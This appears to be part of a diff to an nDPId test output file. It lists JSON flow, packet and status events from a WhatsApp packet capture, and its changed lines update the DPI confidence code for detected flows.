00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655110961423,"flow_last_seen":1655110961423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655110961423,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1655110961423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655110961423,"pkt":"eJS0JASgYDjgxTWgCABFAAA8fpBAAD8Gg7HAqAJkszzDMZOGFGbaRgeTAAAAAKAC\/\/9KQgAAAgQFtAQCCAo4pQHWAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1655110961452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655110961452,"pkt":"eJS0JASgYDjgxTWgCABFAAA0fpFAAD8Gg7jAqAJkszzDMZOGFGbaRgeUJF2xy4AQAIA9NgAAAQEICjilAfPDMqHR"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1655110962269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655110962269,"pkt":"eJS0JASgYDjgxTWgCABFAAA4fpJAAD8Gg7PAqAJkszzDMZOGFGbaRgeUJF2xy4AYAID0swAAAQEICjilBSTDMqHRRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655110961423,"flow_last_seen":1655110962300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655110962300,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655110961423,"flow_last_seen":1655110962300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655110962300,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111268965,"flow_last_seen":1655111268965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111268965,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1655111268965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111268965,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EatAAD8G8JbAqAJkszzDMZMqFGZD+lK5AAAAAKAC\/\/8O2QAAAgQFtAQCCApKc3b0AAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1655111268994,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111268994,"pkt":"eJS0JASgYDjgxTWgCABFAAA0EaxAAD8G8J3AqAJkszzDMZMqFGZD+lK6LP1J\/oAQAVcnzwAAAQEICkpzdxL1CahM"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1655111269269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111269269,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Ea1AAD8G8JjAqAJkszzDMZMqFGZD+lK6LP1J\/oAYAVfhawAAAQEICkpzeCT1CahMRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111268965,"flow_last_seen":1655111269298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655111269298,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111268965,"flow_last_seen":1655111269298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655111269298,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":617,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":617,"packets-processed":616,"total-skipped-flows":0,"total-l4-payload-len":44964,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":78,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":78,"total-idle-flows":67,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":515,"global_ts_msec":1655111789393} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111789393,"flow_last_seen":1655111789393,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111789393,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1655111789393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111789393,"pkt":"eJS0JASgYDjgxTWgCABFAAA8zPVAAD8GNUzAqAJkszzDMbrCFGZ1lRVTAAAAAKAC\/\/8y6QAAAgQFtAQCCArIErl2AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1655111789426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111789426,"pkt":"eJS0JASgYDjgxTWgCABFAAA0zPZAAD8GNVPAqAJkszzDMbrCFGZ1lRVUyQX5N4AQAKyN9wAAAQEICsgSuZfNwELk"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1655111789520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111789520,"pkt":"eJS0JASgYDjgxTWgCABFAAA4zPdAAD8GNU7AqAJkszzDMbrCFGZ1lRVUyQX5N4AYAKxISAAAAQEICsgSufXNwELkRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111789393,"flow_last_seen":1655111789552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655111789552,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":624,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655104186658,"flow_last_seen":1655104187274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655111789765,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111789393,"flow_last_seen":1655111789552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655111789552,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":624,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655104186658,"flow_last_seen":1655104187274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655111789765,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111826253,"flow_last_seen":1655111826253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111826253,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1655111826253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111826253,"pkt":"eJS0JASgYDjgxTWgCABFAAA8UhNAAD8GsD7AqAJkszzDIbU6FGZjXyJuAAAAAKAC\/\/8VRAAAAgQFtAQCCAoGi6NWAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1655111826283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111826283,"pkt":"eJS0JASgYDjgxTWgCABFAAA0UhRAAD8GsEXAqAJkszzDIbU6FGZjXyJv3hHXrIAQAKwMuwAAAQEICgaLo3SOAvK7"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1655111826284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111826284,"pkt":"eJS0JASgYDjgxTWgCABFAAA4UhVAAD8GsEDAqAJkszzDIbU6FGZjXyJv3hHXrIAYAKzHZwAAAQEICgaLo3aOAvK7RUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111826253,"flow_last_seen":1655111826285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655111826285,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111826253,"flow_last_seen":1655111826285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655111826285,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111980061,"flow_last_seen":1655111980061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111980061,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1655111980061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111980061,"pkt":"eJS0JASgYDjgxTWgCABFAAA8q99AAD8GVmLAqAJkszzDMZO+FGb1swWwAAAAAKAC\/\/8QqwAAAgQFtAQCCAo4qiGmAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1655111980164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111980164,"pkt":"eJS0JASgYDjgxTWgCABFAAA0q+BAAD8GVmnAqAJkszzDMZO+FGb1swWxsMz8dIAQAICfhAAAAQEICjiqIhkXwNnv"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1655111980338,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111980338,"pkt":"eJS0JASgYDjgxTWgCABFAAA4q+FAAD8GVmTAqAJkszzDMZO+FGb1swWxsMz8dIAYAIBZhQAAAQEICjiqIscXwNnvRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111980061,"flow_last_seen":1655111980422,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655111980422,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111980061,"flow_last_seen":1655111980422,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655111980422,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655111980926,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111980926,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nTtAAD8GZRbAqAJkszzDIbXwFGY7fhdqAAAAAKAC\/\/9FJAAAAgQFtAQCCAoGjKWkAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111980926,"pkt":"eJS0JASgYDjgxTWgCABFAAA0nTxAAD8GZR3AqAJkszzDIbXwFGY7fhdrAsizuoAQAKw+YAAAAQEICgaMpcT4l4Wb"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111980926,"pkt":"eJS0JASgYDjgxTWgCABFAAA4nT1AAD8GZRjAqAJkszzDIbXwFGY7fhdrAsizuoAYAKz5CQAAAQEICgaMpcn4l4WbRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655111980926,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655111980926,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":648,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":648,"packets-processed":647,"total-skipped-flows":0,"total-l4-payload-len":48127,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":82,"total-detection-updates":0,"total-updates":0,"current-active-flows":14,"total-active-flows":82,"total-idle-flows":68,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":537,"global_ts_msec":1655113084330} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655113084330,"flow_last_seen":1655113084330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655113084330,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1655113084330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655113084330,"pkt":"eJS0JASgYDjgxTWgCABFAAA81OlAAD8GLVjAqAJkszzDMZVaFGZIDGKXAAAAAKAC\/\/9f+wAAAgQFtAQCCAo4tSFvAAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1655113084383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655113084383,"pkt":"eJS0JASgYDjgxTWgCABFAAA01OpAAD8GLV\/AqAJkszzDMZVaFGZIDGKYqtuzMYAQAID\/YQAAAQEICji1IaRj8syi"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1655113084570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655113084570,"pkt":"eJS0JASgYDjgxTWgCABFAAA41OtAAD8GLVrAqAJkszzDMZVaFGZIDGKYqtuzMYAYAIC5cwAAAQEICji1IkFj8syiRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655113084330,"flow_last_seen":1655113084612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655113084612,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105188559,"flow_last_seen":1655105188835,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655113084909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 